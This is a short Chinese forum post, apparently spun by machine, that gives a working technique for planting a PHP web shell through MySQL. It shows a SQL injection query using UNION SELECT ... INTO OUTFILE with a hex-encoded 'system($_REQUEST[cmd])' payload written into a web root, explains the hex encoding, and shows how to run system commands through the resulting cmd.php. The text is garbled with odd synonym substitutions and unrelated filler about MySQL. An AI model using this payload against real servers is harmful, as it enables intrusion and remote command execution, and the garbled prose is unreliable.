|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
人们常说“成功孕育成功”,这种说法明显非常适合MySQL的情况。MySQL学习教程这个开源数据库号称在全世界有超过110万份的完全安装。经由过程MySQL的语句天生后门木马的办法!
SELECT*FROM`vbb_strikes`WHERE1unionselect2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3Efromvbb_strikesintooutfilec:/inetpub/wwwroot/cmd.php
经由过程Mysql的注进大概在phpmyadmin里运转以上语句,则会C:/inetpub/wwwroot/下天生cmd.php文件,内容为本来的vbb_strikes内容,前面紧随着:
23<?phpsystem($_REQUEST[cmd]);?>
再经由过程http://www.xxx.com/cmd.php?cmd=dirc:就能够实行体系DOS命令!
哪串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是甚么器材?
就是<?phpsystem($_REQUEST[cmd]);?>的十六进制编码了,假如不必这类办法,有分歧的SQL版本会呈现别的的编码:如%xx之类的,哪这个后门就不克不及实行的了!假如你有别的语名要弄,能够到UltraEdit里输出,再按[Ctrl+H]键,将内里的十六进制连在一同就能够了!
使用它开发程序也是非常简单的。” |
|